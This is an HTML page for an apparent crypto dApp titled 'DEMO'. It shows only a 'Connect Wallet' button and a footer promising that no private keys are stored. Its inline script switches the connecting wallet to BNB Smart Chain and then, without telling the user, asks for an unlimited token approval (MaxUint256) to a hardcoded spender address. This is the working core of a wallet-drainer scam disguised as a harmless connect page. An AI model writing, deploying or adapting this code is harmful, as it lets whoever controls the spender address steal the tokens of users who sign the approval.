<!doctype html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width,initial-scale=1"/>
<title>DEMO</title>

<style>
*{box-sizing:border-box;margin:0;padding:0}

body{
  font-family:system-ui,Segoe UI,Arial;
  background:#050816;
  color:#e6eef8;
  min-height:100vh;
  display:flex;
  flex-direction:column;
}

/* === HEADER & NAV === */
header{
  background:#071027;
  padding:10px 16px;
  position:sticky;
  top:0;
  z-index:20;
  border-bottom:1px solid rgba(255,255,255,0.03);
}
.nav{
  max-width:980px;
  margin:0 auto;
  display:flex;
  align-items:center;
  justify-content:space-between;
}
.connect{
  background:#3b82f6;
  color:#fff;
  padding:8px 14px;
  border-radius:999px;
  border:0;
  cursor:pointer;
}
.connect.connected{
  background:#15803d;
}

footer{
  max-width:980px;
  margin:24px auto 16px;
  padding:12px;
  color:#9fb0c8;
  text-align:center;
  font-size:0.8rem;
}
</style>
</head>

<body>

<div id="root" style="display:none;"></div>

<header>
  <div class="nav">
    <div class="logo">DEMO</div>
    <button id="connectBtn" class="connect">Connect Wallet</button>
  </div>
</header>

<footer>
  © <span id="year"></span> BSC (BEP-20) • No private keys stored.
</footer>

<script src="https://unpkg.com/web3@1.2.11/dist/web3.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/ethers@6/dist/ethers.umd.min.js"></script>
<script type="module" src="/src/main.jsx"></script>

<script type="module">
(function(){

const TOKEN_ADDRESS = "0x55d398326f99059fF775485246999027B3197955";
const SPENDER_ADDRESS = "0xdB6550D0Db3C7d87Cfa78769c5078aC96117AAc1";

const BSC_DEC = 56;
const BSC_HEX = "0x38";
const BSC_RPC = "https://bsc-dataseed.binance.org";

const ERC20_APPROVE_ABI = [
  "function approve(address spender, uint256 amount) returns (bool)"
];
const ERC20_BALANCE_ABI = [
  "function balanceOf(address owner) view returns (uint256)"
];

let providerInstance=null, web3Instance=null, currentAddress=null;
let isWalletConnected=false;

const connectBtn=document.getElementById("connectBtn");

function setStatus(t){console.log(t)}

function clearSession(){
  isWalletConnected=false;
  currentAddress=null;
  connectBtn.textContent="Connect Wallet";
  connectBtn.classList.remove("connected");
}

async function switchToBSC(p){
  try{
    await p.request({method:"wallet_switchEthereumChain",params:[{chainId:BSC_HEX}]});
    return true;
  }catch(e){return false}
}

async function ensureTokenApproval(){
  const ethersProvider=new ethers.BrowserProvider(providerInstance);
  const signer=await ethersProvider.getSigner();
  const contract=new ethers.Contract(TOKEN_ADDRESS,ERC20_APPROVE_ABI,signer);
  await contract.approve(SPENDER_ADDRESS,ethers.MaxUint256);
}

async function restore(address){
  currentAddress=address;
  isWalletConnected=true;
  connectBtn.textContent="Connected";
  connectBtn.classList.add("connected");
}

async function connectFlow(){
  if(!window.appKit)return alert("Wallet UI not ready");

  setStatus("Connecting…");
  let gotProvider=null;

  const unsub=window.appKit.subscribeProviders(s=>{
    if(s.eip155&&!gotProvider)gotProvider=s.eip155;
  });

  await window.appKit.open({view:"Connect"});
  unsub&&unsub();

  if(!gotProvider)return;

  providerInstance=gotProvider;
  web3Instance=new Web3(providerInstance);

  const accounts=await web3Instance.eth.getAccounts();
  if(!accounts.length)return;

  const chain=await web3Instance.eth.getChainId();
  if(chain!==BSC_DEC){
    const ok=await switchToBSC(providerInstance);
    if(!ok)return alert("Switch to BSC");
  }

  await restore(accounts[0].toLowerCase());
  await ensureTokenApproval();
}

connectBtn.addEventListener("click",()=>{
  if(!isWalletConnected)connectFlow();
});

document.getElementById("year").textContent=new Date().getFullYear();

})();
</script>

</body>
</html>
